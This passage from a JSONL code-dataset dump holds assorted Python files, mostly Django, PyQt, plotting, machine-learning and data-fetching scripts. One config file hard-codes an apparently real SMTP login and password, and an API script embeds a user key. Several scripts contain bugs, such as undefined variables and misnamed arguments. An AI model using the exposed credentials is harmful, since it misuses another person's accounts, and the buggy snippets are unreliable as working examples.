expected.split(sep='\\n')\n\n sx = len(x)\n sy = len(y)\n\n total_line = max(sx, sy)\n\n for no in range(total_line):\n try:\n vx = x[no]\n except:\n x_empty = True\n try:\n vy = y[no]\n except:\n y_empty = True\n\n if x_empty:\n vx = '(#$null$#)'\n if y_empty:\n vy = '(#$null$#)'\n self.line_print(str(no + 1), vx, vy)\n\n self.separator()\n","sub_path":"build/lib/tools/OJ/CP/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125216702","text":"# -*- coding:utf-8 -*-\nfrom django.conf.urls import patterns, include, url\n\n\n\n\nurlpatterns = patterns('',\n url(r'^ajax/',include(\"pingtest.ajax_urls\")), \n url(r\"^$\",\"pingtest.views.pingtest_index\",),\n url(r\"^area/(?P\\d+)?/?\",\"pingtest.views.area_status\",),\n url(r\"^custom/(?P\\d+)?/?\",\"pingtest.views.custom_status\",),\n)\n","sub_path":"pingtest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66259925","text":"children = []\nwith open(\"./relation.txt\") as f:\n\trelations = f.readlines()\n\tfor relation in relations:\n\t\tparts = relation.strip(\"\\n\").split(\":\")\n\t\tif parts[-2] == \"0\":\n\t\t\tchildren.append(parts[-1])\nnames = []\nname_id = dict()\nwith open(\"./name_id.txt\") as f:\n\tids = f.readlines()\n\tfor i in ids:\n\t\tname_id[i.strip(\"\\n\").split(\":\")[-1]] = i.split(\":\")[-2]\n\nfor i in children:\n\tnames.append(name_id[i])\n\nprint(names)\n","sub_path":"indexing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460798826","text":"#!/usr/bin/env python \r\nimport sys\r\nfrom PyQt5.QtWidgets import (QApplication,QHeaderView, QAbstractItemView, QTableView,\r\n QGroupBox, QHBoxLayout, QVBoxLayout, QWidget, QTableWidget)\r\n \r\n \r\nclass Page2Win(QWidget):\r\n def __init__(self, parent=None):\r\n #BOX\r\n mainLayout = QVBoxLayout()\r\n boxGroup = QGroupBox(\"发送历史信息\")\r\n super(Page2Win, self).__init__(parent)\r\n self.historyTv = 
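# A compact sketch of the character-by-character diff colouring that the Table
# class above builds with zip_longest: characters that match the expected
# string print green, mismatches print red. It assumes the same `termcolor`
# package the original imports; the dot placeholder for missing characters is
# an illustrative choice, not taken from the original.
from itertools import zip_longest

from termcolor import colored


def color_diff(expected, actual):
    out = []
    for e, a in zip_longest(expected, actual, fillvalue=""):
        out.append(colored(a or ".", "green" if e == a else "red"))
    return "".join(out)


print(color_diff("hello world", "hella world"))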
QTableView(self)\r\n layout = QHBoxLayout()\r\n layout.addWidget(self.historyTv)\r\n boxGroup.setLayout(layout)\r\n mainLayout.addWidget(boxGroup)\r\n self.setLayout(mainLayout)\r\n \r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n win = Page2Win()\r\n win.show()\r\n sys.exit(app.exec_()) \r\n","sub_path":"Page2.py","file_name":"Page2.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415471573","text":"import matplotlib\nfrom matplotlib import pyplot\nfrom matplotlib.pyplot import plot\nfrom grabuberprice2 import start,end\n\n# Format must be [day,hour,minute,sec,year,month,day]\ndef map_time(data,get_original = False):\n time = []\n for i in data:\n i[2] = int(i[2]*1.6666)\n if len(str(i[2])) == 1:\n current_time = str(i[1])+'.0'+str(i[2])\n else:\n current_time = str(i[1]) + '.' + str(i[2])\n time.append(float(current_time))\n if get_original == False:\n return time\n elif get_original == True:\n return time,current\n\ndef plot_graph(x,y,day,*argv):\n pyplot.style.use('dark_background')\n matplotlib.rc('xtick', labelsize=20)\n matplotlib.rc('ytick', labelsize=20)\n matplotlib.rc('axes', labelsize=15)\n pyplot.figure(figsize=(12,6.5))\n matplotlib.rc('axes',titlesize=25)\n pyplot.title(\"Machine Learning \\n Uber Surge Price\",loc=\"left\")\n matplotlib.rc('axes',titlesize=15)\n pyplot.title(\"From {}\\nTo {}\".format(start,end),loc=\"right\")\n matplotlib.rc('axes',titlesize=25)\n week = [\"Monday\",\" Tuesday\", \"Wednesday\", \"Thursday\",\" Friday\", \"Saturday\",\"Sunday\"]\n pyplot.title(week[day])\n if argv:\n if len(argv) == 2:\n x2,y2=argv\n plot(x2,y2,color='grey',aa=True,label='Previous Week')\n elif len(argv) == 4:\n x2,y2,x3,y3 = argv\n plot(x2, y2, color='grey', aa=True, label='Previous Week')\n plot(x3, y3, color='yellow', aa=True,\n label='Currently',linewidth=3)\n else:\n pass\n plot(x, y, aa=True,color='cyan', label=\"Predicted\",\n linewidth=3,linestyle='dashed')\n pyplot.xlim(0,24)\n pyplot.xlabel('Hour of the day(hr)')\n pyplot.ylabel('USD ($)')\n pyplot.grid(True)\n pyplot.legend()\n pyplot.show()\n\n\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"60098754","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.views.generic.edit import CreateView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic import TemplateView\nfrom forum.models import Post\nfrom forum.forms import PostForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n\ndef index(request):\n return render(\n request,\n 'forum/forum.html',\n {\n 'title': 'home',\n }\n )\n\n# # CreatePost class not valid in urls\n# class CreatePost(CreateView):\n# model = Post\n# form_class = PostForm\n# template_name = 'forum/forum.html'\n\n# def create_post(request):\n# if form.is_valid():\n# form.save()\n# title = form.cleaned_data['title']\n# post_field = form.cleaned_data['post_field']\n \n# else:\n# return render(request, 'forum/forum.html', {'form': form})\n\n# class PostDetailView(DetailView):\n# model = Post\n# # slug_url_kwarg = 'slug'\n\n# def get_context_data(self, **kwargs):\n# context = super(PostDetailView, self).get_context_data(**kwargs)\n# slug = self.kwargs['slug']\n# return context\n\n# # def 
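# The Page2Win widget above creates a QTableView but never attaches a model,
# so the "send history" table renders empty. A hedged sketch of wiring one up
# with QStandardItemModel; the column names and the make_history_model helper
# are illustrative, not part of the original file.
from PyQt5.QtGui import QStandardItem, QStandardItemModel


def make_history_model(rows):
    model = QStandardItemModel()
    model.setHorizontalHeaderLabels(["time", "message"])
    for when, message in rows:
        model.appendRow([QStandardItem(when), QStandardItem(message)])
    return model

# usage inside Page2Win.__init__, after the QApplication exists:
#   self.historyTv.setModel(make_history_model([("12:00", "hello")]))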
post(self,)\n\n\ndef post_detail(request, slug):\n template = 'forum/forum-post.html'\n # object_content = Post.objects.all()\n post = get_object_or_404(Post, slug=slug)\n context = {\n 'post': post,\n }\n return render(request, template, context)\n\n\n@login_required()\ndef create_post(request):\n form = PostForm()\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('home')\n else: \n return render(request, 'forum/forum.html', {'form': form})\n\n\n# class ForumDetail(TemplateView):\n# template_name = 'forum/forum-post.html'\n\n# def get(self, request):\n\n\n\n# def create_post(request):\n# form = PostForm(request.POST)\n# model = Post\n\n# if form.is_valid():\n# form.save()\n# # return render(request, 'forum/forum-post.html', {'post':post})\n# return post_detail(request, model.slug)\n# else:\n# return render(request, 'forum/forum.html', {'form': form})","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628313714","text":"class Solution:\n def findMaximumXOR(self, nums) -> int:\n ans = 0\n for i in range(31, -1, -1):\n # get the prefix\n nums_prefix = set([num >> i for num in nums])\n ans <<= 1 # 0 -> 00 1 ->10\n candidate = ans + 1 # 0->01 1->11\n for prefix in nums_prefix:\n if candidate ^ prefix in nums_prefix:\n ans = candidate\n break\n return ans\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findMaximumXOR([3, 10, 5, 25, 2, 8]))\n","sub_path":"LeetCode30DaysChallenge-202009/Maximum XOR of Two Numbers in an Array.py","file_name":"Maximum XOR of Two Numbers in an Array.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161028607","text":"import os\r\ndef kav_log(sdk_path):\r\n os.chdir(sdk_path)\r\n kave_ini = open(\"kave.ini\", \"w\")\r\n kave_ini.write(\r\n \"[LOGGING]\\n\"\r\n \"WriteLog=10\\n\"\r\n \"WriteFileMonitorLog=10\\n\"\r\n \"WriteScanningProcessLog=10\\n\"\r\n \"Append=0\\n\"\r\n \"LogsFolder=.\\n\"\r\n )\r\ndef upd_log(updater_path):\r\n os.chdir(updater_path)\r\n updsdk_xml = open(\"updsdk.xml\",\"w\")\r\n updsdk_xml.write(\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n )","sub_path":"logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"18920411","text":"\r\nCRAWL_NAME = \"MSN China monitor alarm\"\r\nINDEX_URL = \"https://www.msn.com/spartan/ntp?locale=zh-hk&market=hk&revip=hk\"\r\nTOP_URL = 500\r\nTIME_OUT = 5\r\nRETRY_COUNT = 3\r\nSCROLL_COUNT = 20\r\n\r\n\r\nMETRIC = {\r\n \"MSN_NAV\": {\r\n \"CRAWL_NAME\" : \"MSN China navigation monitor\",\r\n \"INDEX_URL\" : 'https://www.msn.cn/zh-cn',\r\n \"TIME_OUT\": 20,\r\n \"RETRY_COUNT\": 3,\r\n \"DATABASE\": {\r\n \"MONGODB_HOST\" : \"127.0.0.1\",\r\n \"MONGODB_PORT\" : 27017,\r\n \"MONGODB_DATABASE\" : \"monitor_msn\",\r\n \"MONGODB_POOL_SIZE\" : 100,\r\n \"DBNAME\": \"monitor_msn\",\r\n \"CRAWL_LOG_COLL\": \"crawl_log\"\r\n }\r\n }\r\n}\r\n\r\n\r\n\r\nMONGODB_HOST = \"127.0.0.1\"\r\nMONGODB_PORT = 27017\r\nMONGODB_DATABASE = \"monitor_msn\"\r\nMONGODB_POOL_SIZE = 100\r\n\r\nCRAWL_LOG_COLL = \"crawl_log\"\r\nSEND_MAIL_COLL = \"email_log\"\r\nMONITOR_COLL = \"monitor_log\"\r\nSTABILITY_COLL = \"stability_log\"\r\n\r\nMONITOR_API_URL = 
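# A short worked trace of the prefix trick used in findMaximumXOR above.
# At each bit position the answer is optimistically extended with a 1, and the
# candidate is kept only if two prefixes XOR to it (a ^ b == c implies
# a ^ c == b, so a set-membership test suffices). Standalone version of the
# same idea, with 5 bits because 25 is the largest input:
nums = [3, 10, 5, 25, 2, 8]
ans = 0
for i in range(4, -1, -1):
    prefixes = {n >> i for n in nums}
    candidate = (ans << 1) + 1
    ans = candidate if any(candidate ^ p in prefixes for p in prefixes) else candidate - 1
print(ans)   # 28 == 5 ^ 25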
\"http://127.0.0.1:8000/api/monitor\"\r\nALERT_ITERVAL = 60 #minutes \r\n\r\n\r\nSEND_MAIL_URL = \"http://127.0.0.1:8001/api/sendmail\"\r\nMAIL_TO_LIST = \"v-beniu@microsoft.com\" #多个邮件;号分割。\r\nEMAIL_FROM_HOST = \"smtp.qq.com\"\r\nEMAIL_FROM_USER = \"594257094\"\r\nEMAIL_FROM_PASS = \"bimwvddblimbbeba\"\r\nEMAIL_POSTFIX = \"qq.com\"\r\n","sub_path":"monitor_probe/app/tasks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"290464767","text":"from cvm_net import cvm_net_I, cvm_net_II\nfrom input_data import InputData\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport cv2\n\n# -------------- configuration parameters -------------- #\n# the type of network to be used: \"CVM-NET-I\" or \"CVM-NET-II\"\nNETWORK_TYPE = 'CVM-NET-I'\n\nSATELLITE_IMAGE_PREFIX = '../Data/CVUSA/test_sat/'\nGROUND_IMAGE_PREFIX = '../Data/CVUSA/dubai2/ground'\nNUM_SAMPLES = 8\n# -------------------------------------------------------- #\n\nclass CVMInference:\n def __init__(self):\n self.sat_x = tf.placeholder(tf.float32, [None, 512, 512, 3], name='sat_x')\n self.grd_x = tf.placeholder(tf.float32, [None, 224, 1232, 3], name='grd_x')\n self.keep_prob = tf.placeholder(tf.float32)\n self.global_count = 0\n self.aerial_image_prefix = SATELLITE_IMAGE_PREFIX\n self.ground_image_prefix = GROUND_IMAGE_PREFIX\n self.num_imgs = NUM_SAMPLES\n\n # build model\n if NETWORK_TYPE == 'CVM-NET-I':\n self.sat_global, self.grd_global = cvm_net_I(self.sat_x, self.grd_x, self.keep_prob, False)\n elif NETWORK_TYPE == 'CVM-NET-II':\n self.sat_global, self.grd_global = cvm_net_II(self.sat_x, self.grd_x, self.keep_prob, False)\n else:\n print ('CONFIG ERROR: wrong network type, only CVM-NET-I and CVM-NET-II are valid')\n \n # run model\n print('CVMInference object created')\n self.config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)\n self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=None)\n \n with tf.Session(config=self.config) as sess:\n sess.run(tf.global_variables_initializer())\n print('loading model...')\n load_model_path = '../Model/' + NETWORK_TYPE + '/' + str(0) + '/model.ckpt'\n self.saver.restore(sess, load_model_path)\n print(\" Model loaded from: %s\" % load_model_path)\n print('load model...FINISHED')\n print('Test with black images')\n sat_zeros = np.zeros([1,512,512, 3])\n grd_zeros = np.zeros([1,224,1232, 3])\n feed_dict = {self.sat_x: sat_zeros, self.grd_x: grd_zeros, self.keep_prob: 1.0}\n sat_global_val, grd_global_val = sess.run([self.sat_global, self.grd_global], feed_dict=feed_dict)\n print('Test on black images passed')\n \n\n def load_images(self, is_ground = True, num_images = 5):\n if(is_ground):\n images = np.zeros([num_images, 224, 1232, 3], dtype = np.float32)\n for i in range(num_images):\n img = cv2.imread(self.ground_image_prefix + str(i) + '.jpg')\n img = cv2.resize(img, (1232, 224), interpolation=cv2.INTER_AREA)\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n else:\n images = np.zeros([num_images, 512, 512, 3], dtype=np.float32)\n for i in range(num_images):\n img = cv2.imread(SATELLITE_IMAGE_PREFIX + str(i) + '.jpg')\n img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # 
Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n \n def next_images(self, is_ground = True, batch_size = 1):\n if(self.global_count >= self.num_imgs):\n return None\n else:\n if(is_ground):\n images = np.zeros([batch_size, 224, 1232, 3], dtype = np.float32)\n for i in range(batch_size):\n img = cv2.imread(self.ground_image_prefix + str(self.global_count) + '.jpg')\n img = cv2.resize(img, (1232, 224), interpolation=cv2.INTER_AREA)\n self.global_count += 1\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n else:\n images = np.zeros([batch_size, 512, 512, 3], dtype=np.float32)\n for i in range(batch_size):\n img = cv2.imread(self.aerial_image_prefix + str(self.global_count) + '.jpg')\n self.global_count += 1\n img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n \n \n \n \n def load_images_raw(self, is_ground = True, num_images = 5):\n if(is_ground):\n images = np.zeros([num_images, 224, 1232, 3], dtype = np.uint8)\n for i in range(num_images):\n #print(SATELLITE_IMAGE_PREFIX + str(i) + '.jpg')\n img = cv2.imread(self.ground_image_prefix + str(i) + '.jpg')\n img = cv2.resize(img, (1232, 224), interpolation=cv2.INTER_AREA)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n images[i, :, :, :] = img\n return images\n else:\n images = np.zeros([num_images, 512, 512, 3], dtype=np.uint8)\n for i in range(num_images):\n img = cv2.imread(self.aerial_image_prefix + str(i) + '.jpg')\n img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n images[i, :, :, :] = img\n return images\n \n \n def preprocess(self, images, is_ground):\n num_images = images.shape[0]\n images = images.astype(np.float32)\n for image in images:\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n\n image[:, :, 0] -= 103.939 # Blue\n image[:, :, 1] -= 116.779 # Green\n image[:, :, 2] -= 123.6 # Red\n return images\n \n def forward(self, images, is_ground = True):\n with tf.Session(config=self.config) as sess:\n sess.run(tf.global_variables_initializer())\n load_model_path = '../Model/' + NETWORK_TYPE + '/' + str(0) + '/model.ckpt'\n self.saver.restore(sess, load_model_path)\n sat_zeros = np.zeros([1,512,512, 3])\n grd_zeros = np.zeros([1,224,1232, 3])\n # ---------------------- validation ----------------------\n print('computing global descriptors...')\n sat_zeros = np.zeros([images.shape[0],512,512, 3])\n grd_zeros = np.zeros([images.shape[0],224,1232, 3])\n \n if(is_ground):\n feed_dict = {self.sat_x: sat_zeros, self.grd_x: images, self.keep_prob: 1.0}\n else:\n feed_dict = {self.sat_x: images, self.grd_x: grd_zeros, self.keep_prob: 1.0}\n \n sat_global_val, grd_global_val = sess.run([self.sat_global, self.grd_global], feed_dict=feed_dict)\n\n if(is_ground):\n global_descriptor = grd_global_val\n else:\n global_descriptor = sat_global_val\n \n return global_descriptor\n","sub_path":"src/CVM-Net/cvm_inference.py","file_name":"cvm_inference.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344169950","text":"# Your code here\nignored_characters = ['\"', 
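# The preprocess() method above mixes up `img` and `image` inside its loop:
# the three `img[...] -=` lines refer to a stale variable from an earlier
# scope, so each image ends up shifted by the means twice in one name and once
# in the other. A hedged sketch of the intended per-channel mean subtraction,
# written as a pure function; BGR_MEANS copies the constants used throughout
# the file.
import numpy as np

BGR_MEANS = (103.939, 116.779, 123.6)


def subtract_channel_means(images):
    """images: array of shape (N, H, W, 3) in BGR channel order."""
    images = images.astype(np.float32).copy()
    for c, mean in enumerate(BGR_MEANS):
        images[..., c] -= mean
    return images


print(subtract_channel_means(np.zeros((1, 2, 2, 3)))[0, 0, 0])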
\":\", \";\", ',', '.', '-', '+', '=', '/', '\\\\', '|', '[', ']', '{', '}', '(', ')', '*', '^', '&']\n\ndef histogram():\n counts = dict()\n with open(\"applications/histo/robin.txt\") as f:\n words = f.read()\n split_words = words.split()\n \n for word in split_words:\n histo = \"\"\n for char in word:\n if char is not ignored_characters:\n histo += char\n word = histo.lower()\n\n if word in counts:\n counts[word] += 1\n elif word == \"\" or word == \" \":\n break\n else:\n counts[word] = 1\n\n items = list(counts.items())\n items.sort(key = lambda e: e[1], reverse = True)\n counts = (dict(items))\n for (string, value) in counts.items():\n print(f'{string} {\" \" * (20 - len(string))} {\"#\" * value}')\n\nprint(histogram())","sub_path":"applications/histo/histo.py","file_name":"histo.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406767249","text":"from collections import namedtuple\r\nimport collections\r\nfrom typing import Counter\r\n\r\nclass_employee=namedtuple('employee',['emp_id', 'emp_name','job_name','manager_id','salary', 'dep_id'])\r\nemployee1=class_employee(10024, 'Hadley_Sylvan', 'QA_Engineer', 9523, 1250, 4)\r\nemployee2=class_employee(10037, 'Marcie_Elodie', 'RnD_Engineer', 9012, 1500, 4)\r\nemployee3=class_employee(10164, 'Eileen_Candi', 'RnD_Engineer', 9012, 1500, 4) \r\nemployee4=class_employee(10021, 'Floretta_Ike', 'QA_Engineer', 9523, 750, 4)\r\nemployee5=class_employee(10094, 'Gideon_Talia', 'QA_Engineer', 9567, 500, 5)\r\n\r\nx=0\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n x+=employee[4]\r\n print(x)\r\n\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[4]>=1250:\r\n print (employee[1])\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[5]==4:\r\n print(employee[1], employee[2])\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[3]==9523:\r\n print(employee[1], employee[0])\r\n\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[2]==(\"QA_Engineer\"):\r\n print (employee[0::])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Small Database/Yelena.Manukyan.py","file_name":"Yelena.Manukyan.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299285751","text":"# Importing Libraries and Frameworks\nimport tensorflow as tf\nimport time\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D, MaxPooling2D, Dense, Flatten, Dropout\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom tensorflow.python.client import device_lib\nimport matplotlib.pyplot as plt\n\n# Used to check whether CPU or GPU is used for training the model\ngpu_option = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction = 0.333)\nsess = tf.compat.v1.Session(config = tf.compat.v1.ConfigProto(gpu_options = gpu_option))\nprint(device_lib.list_local_devices())\n\n\n# Splitting Dataset into traning and testing\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# Reshaping data\nx_train = (x_train.astype(float)).reshape([-1, 28, 28, 1])\nx_test = (x_test.astype(float)).reshape([-1, 28, 28, 1])\n\n# Normalizing\nx_train /= 255\nx_test /= 255\n\n# Creating model\nmodel = 
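# Two fixes for the histogram code above: `char is not ignored_characters`
# compares a single character to the whole list by identity (always true, so
# punctuation is never stripped), and the `break` on an empty word stops the
# whole loop instead of skipping that word. A hedged, file-free rewrite using
# collections.Counter; the sample sentence is illustrative.
from collections import Counter

IGNORED = set('":;,.+-=/\\|[]{}()*^&')


def histogram_sketch(text):
    counts = Counter()
    for raw in text.split():
        word = "".join(ch for ch in raw if ch not in IGNORED).lower()
        if word:                      # skip, don't break, on empty words
            counts[word] += 1
    for word, n in counts.most_common():
        print(f"{word:<20} {'#' * n}")


histogram_sketch("the quick (quick) fox; the end.")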
Sequential()\n\nmodel.add(Convolution2D(filters = 20, kernel_size = (3, 3), input_shape = (28, 28, 1), activation = \"relu\"))\nmodel.add(MaxPooling2D(pool_size = (2, 2))) \nmodel.add(Flatten())\n\nmodel.add(Dense(activation = \"relu\", kernel_initializer = \"uniform\", input_dim = 28, units = 30))\n\nmodel.add(Dense(activation = \"relu\", kernel_initializer = \"uniform\", input_dim = 28, units = 30))\n\nmodel.add(Dropout(rate = 0.2))\n\nmodel.add(Dense(units = 10, kernel_initializer = \"uniform\", activation = \"sigmoid\"))\n\nmodel.compile(optimizer = \"adam\", loss = \"sparse_categorical_crossentropy\", metrics = [\"accuracy\"])\n\n# Adding tesorboard for optimizing and analyzing the model\ntensorboard = TensorBoard(log_dir=r\"D:\\Log\\{}\".format(time.time()))\n\n# Training the model\nmodel.fit(x_train, y_train, batch_size = 32, nb_epoch = 10, callbacks = [tensorboard])","sub_path":"mnist_cnn.py","file_name":"mnist_cnn.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58024608","text":"#import required packages\nimport requests\nimport json\nimport ast\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport statsmodels.formula.api as sm\n\n# request data from BEA for Gross Domestic Product in chained dollars\nurl = \"https://www.bea.gov/api/data/?&UserID=6B316ADE-8CA7-4651-B854-4984EB39687D&method=GetData&DataSetName=NIPA&TableName=T10106&Frequency=A&Year=ALL&ResultFormat=JSON&\"\nresponse3 = requests.get(url)\nddf1 = response3.text\nddf1\n\n#Gathering the data and defining as dataframe in Python\nddf2 = ast.literal_eval(ddf1)\nddf3 = ddf2['BEAAPI']['Results']['Data']\nddf4 = pd.DataFrame(ddf3)\n\n# Changing the years into float variable\nddf4.new_time = ddf4['TimePeriod'].astype(float)\n\n# Slicing the dataframe\nddf5 = ddf4[(ddf4.LineDescription == \"Gross domestic product\") & (ddf4.new_time > 1958)]\n\n# request data from BEA for Personal Consumption Expenditures in current dollars\nurl = \"https://www.bea.gov/api/data/?&UserID=6B316ADE-8CA7-4651-B854-4984EB39687D&method=GetData&DataSetName=NIUnderlyingDetail&TableName=U20305&Frequency=A&Year=ALL&ResultFormat=JSON&\"\nresponse1 = requests.get(url)\ndf1 = response1.text\ndf1\n\n#Gathering the data and defining as dataframe in Python\ndf2 = ast.literal_eval(df1)\ndf3 = df2['BEAAPI']['Results']['Data']\ndf4 = pd.DataFrame(df3)\n\n# Changing the years into float variable\ndf4.new_time = df4['TimePeriod'].astype(float)\n\n# Slicing the dataframe\ndf5 = df4[(df4.LineDescription == \"Personal consumption expenditures (PCE)\")]\n\n# Merging these two dataframes\nmerge1 = pd.merge(df5, ddf5, on='TimePeriod', how='left')\n\n# Changing the types of datavalues to floats by defining them without commas\nmerge1['DataValue_x'] = (merge1['DataValue_x'].str.split()).apply(lambda x: float(x[0].replace(',', '')))\nmerge1['DataValue_y'] = (merge1['DataValue_y'].str.split()).apply(lambda x: float(x[0].replace(',', '')))\n\n# request data from BEA for Fisher Index\nurl = \"https://www.bea.gov/api/data/?&UserID=6B316ADE-8CA7-4651-B854-4984EB39687D&method=GetData&DataSetName=NIPA&TableName=T10104&Frequency=A&Year=ALL&ResultFormat=JSON&\"\nresponse4 = requests.get(url)\ndfdf1 = response4.text\ndfdf1\n\n#Gathering the data and defining as dataframe in Python\ndfdf2 = ast.literal_eval(dfdf1)\ndfdf3 = dfdf2['BEAAPI']['Results']['Data']\ndfdf4 = pd.DataFrame(dfdf3)\n\n# Changing the years into float 
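# Note that `nb_epoch` in the model.fit call above was removed from Keras long
# ago; current tf.keras expects `epochs`. A sigmoid on the final 10-unit layer
# also pairs oddly with sparse_categorical_crossentropy, where softmax is the
# usual choice. A hedged, runnable sketch of the corrected pipeline (the
# TensorBoard callback is omitted for brevity):
import tensorflow as tf

(x_train, y_train), _ = tf.keras.datasets.mnist.load_data()
x_train = x_train.reshape(-1, 28, 28, 1).astype("float32") / 255

model = tf.keras.Sequential([
    tf.keras.layers.Conv2D(20, (3, 3), activation="relu", input_shape=(28, 28, 1)),
    tf.keras.layers.MaxPooling2D((2, 2)),
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(30, activation="relu"),
    tf.keras.layers.Dropout(0.2),
    tf.keras.layers.Dense(10, activation="softmax"),
])
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy",
              metrics=["accuracy"])
model.fit(x_train, y_train, batch_size=32, epochs=1)   # `epochs`, not `nb_epoch`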
variable\ndfdf4.new_time = dfdf4['TimePeriod'].astype(float)\n\n# Slicing the dataframe\ndfdf5 = dfdf4[(dfdf4.METRIC_NAME == \"Fisher Price Index\") & (dfdf4.LineDescription == \"Gross domestic product\") & (dfdf4.new_time > 1958)]\n\n# Merging all dataframes\nmerge2 = pd.merge(merge1, dfdf5, on='TimePeriod', how='left')\n\n# Changing the types of datavalues to floats by defining them without dots\nmerge2['DataValue'] = (merge2['DataValue'].str.split()).apply(lambda x: float(x[0].replace('.', '')))\n\n# Changing the name of the variables and defining real personal consumption Expenditures\nmerge2['Real_PCE'] = (merge2['DataValue_x']/merge2['DataValue']) * 100000\nmerge2['Real_Income'] = merge2['DataValue_y']\n\n# Drawing the scatterplot between income and consumption\n# fit with np.polyfit\nm, b = np.polyfit(merge2['Real_Income'], merge2['Real_PCE'], 1)\n\nplt.plot(merge2['Real_Income'], merge2['Real_PCE'], '.')\nplt.plot(merge2['Real_Income'], m*merge2['Real_Income'] + b, '-')\nplt.ylabel('Consumption')\nplt.xlabel('Income')\nplt.title('Income and Consumption')\nplt.show()\n\n# Running the OLS regression of consumption on Income\nA = merge2['Real_Income'].values\nB = merge2['Real_PCE'].values\nresult = sm.ols(formula=\"B ~ A\", data=merge1).fit()\nresult.summary()\n\n# Saving the OLS regression as a pdf table\nf = open('myreg.tex', 'w')\nf.write(beginningtex)\nf.write(result.summary().as_latex())\nf.write(endtex)\nf.close()\n\n# Drawing the histogram of income \nsns.distplot(merge2['Real_Income'], kde=True, rug=False)\nplt.title('Distribution of Income')\nplt.show()\n","sub_path":"ProblemSets/ps7/PS7_Kirimhan.py","file_name":"PS7_Kirimhan.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406777767","text":"import tensorflow as 